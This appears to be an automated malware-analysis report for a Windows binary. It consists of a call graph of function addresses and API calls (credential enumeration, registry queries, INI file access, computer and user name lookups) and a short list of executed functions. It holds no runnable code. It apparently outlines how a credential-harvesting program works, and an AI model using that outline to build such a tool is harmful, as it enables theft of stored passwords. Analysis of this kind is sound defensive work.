33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 777 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 777 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34073 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34073 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34074 406d1a CreateFileA 33493->34074 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34075 406c62 LoadCursorA SetCursor 33497->34075 34079 406d77 9 API calls 33498->34079 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34077 40a699 12 API calls 33502->34077 33503 40b042 33503->33502 33503->33509 34076 40a57c strlen WriteFile 33503->34076 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34078 406d77 9 API calls 33509->34078 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33559 401e9e strlen strlen 33559->33428 33559->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33559 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33559 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 40 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 40 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 47 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 47 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 47 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33699 403e73 33698->33699 33700 403e46 _mbscpy 33698->33700 33860 40fb00 33699->33860 33912 40f334 334 API calls 33700->33912 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33913 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33913 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33914 4021b6 memset 33716->33914 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33915 4023e5 16 API calls 33719->33915 33720->33719 33723 4085e2 33722->33723 33916 4082cd 11 API calls 33723->33916 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33919 410b62 RegEnumKeyExA 33729->33919 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33920 410a9c RegOpenKeyExA 33731->33920 33923 410b62 RegEnumKeyExA 33731->33923 33732->33728 33921 410add RegQueryValueExA 33734->33921 33737 408694 33922 40848b 10 API calls 33737->33922 33739 4086ab RegCloseKey 33739->33731 33924 410a9c RegOpenKeyExA 33740->33924 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33925 410b62 RegEnumKeyExA 33744->33925 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33926 410a9c RegOpenKeyExA 33748->33926 33927 4080ed 11 API calls 33748->33927 33928 410b62 RegEnumKeyExA 33748->33928 33751 4082a2 RegCloseKey 33751->33748 33929 4045db 33752->33929 33755 4088f7 33937 404656 33755->33937 33757 40872d 33757->33755 33759 408737 wcslen 33757->33759 33761 4088ef LocalFree 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33761->33755 33762 40877a wcsncmp 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 40 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 40 API calls 33786->33946 33947 410b62 RegEnumKeyExA 33786->33947 33789->33778 33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403122 RegCloseKey 33803->33801 33804 410b1e 3 API calls 33805 403058 memset sprintf 33804->33805 33950 410a9c RegOpenKeyExA 33805->33950 33807 403033 33807->33803 33807->33804 33808 4030a2 memset 33807->33808 33809 410b62 RegEnumKeyExA 33807->33809 33811 4030f9 RegCloseKey 33807->33811 33952 402db3 26 API calls 33807->33952 33951 410b62 RegEnumKeyExA 33808->33951 33809->33807 33811->33807 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 33848->33911 33850 40382e 33851 406f06 2 API calls 33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33478 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 33908->33672 33909->33676 33910->33680 33911->33698 33912->33699 33913->33713 33914->33718 33915->33714 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33727 33919->33731 33920->33731 33921->33737 33922->33739 33923->33731 33924->33742 33925->33748 33926->33748 33927->33751 33928->33748 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33755 33932->33757 33932->33760 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33807 33950->33807 33951->33807 33952->33807 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 33990->33991 33992 404785 FreeLibrary 33991->33992 33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34070 444196 52 API calls 34033->34070 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34067 407f90 34037->34067 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34063 407e62 34041->34063 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 34049->34051 34071 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34071 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 34059->34056 34060->34031 34072 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34072 34064 407e94 34063->34064 34065 407e6c strcmp 34063->34065 34064->34041 34065->34064 34066 407e83 strcmp 34065->34066 34066->34064 34068 407fa3 34067->34068 34069 407f99 FindClose 34067->34069 34068->34042 34069->34068 34070->34031 34071->34051 34072->34060 34073->33492 34074->33496 34075->33503 34076->33502 34077->33509 34078->33506 34079->33501 34424 43ffc8 18 API calls 34238 4281cc 15 API calls 34426 4383cc 110 API calls 34239 4275d3 41 API calls 34427 4153d3 22 API calls 34240 444dd7 _XcptFilter 34432 4013de 15 API calls 34434 425115 111 API calls 34435 43f7db 18 API calls 34438 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34242 4335ee 16 API calls 34440 429fef 11 API calls 34243 444deb _exit _c_exit 34441 40bbf0 138 API calls 34246 425115 79 API calls 34445 437ffa 22 API calls 34250 4021ff 14 API calls 34251 43f5fc 149 API calls 34446 40e381 9 API calls 34253 405983 40 API calls 34254 42b186 27 API calls 34255 427d86 76 API calls 34256 403585 20 API calls 34258 42e58e 18 API calls 34261 425115 75 API calls 34263 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34450 434395 16 API calls 34265 441d9c memcmp 34452 43f79b 119 API calls 34266 40c599 43 API calls 34453 426741 87 API calls 34270 4401a6 21 API calls 34272 426da6 memcpy memset memset memcpy 34273 4335a5 15 API calls 34275 4299ab memset memset memcpy memset memset 34276 40b1ab 8 API calls 34458 425115 76 API calls 34462 4113b2 18 API calls 34466 40a3b8 memset sprintf SendMessageA 34080 410bbc 34083 4109cf 34080->34083 34084 4109dc 34083->34084 34085 410a23 memset GetPrivateProfileStringA 34084->34085 34086 4109ea memset 34084->34086 34091 407646 strlen 34085->34091 34096 4075cd sprintf memcpy 34086->34096 34089 410a0c WritePrivateProfileStringA 34090 410a65 34089->34090 34092 40765a 34091->34092 34093 40765c 34091->34093 34092->34090 34095 4076a3 34093->34095 34097 40737c strtoul 34093->34097 34095->34090 34096->34089 34097->34093 34278 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083F8
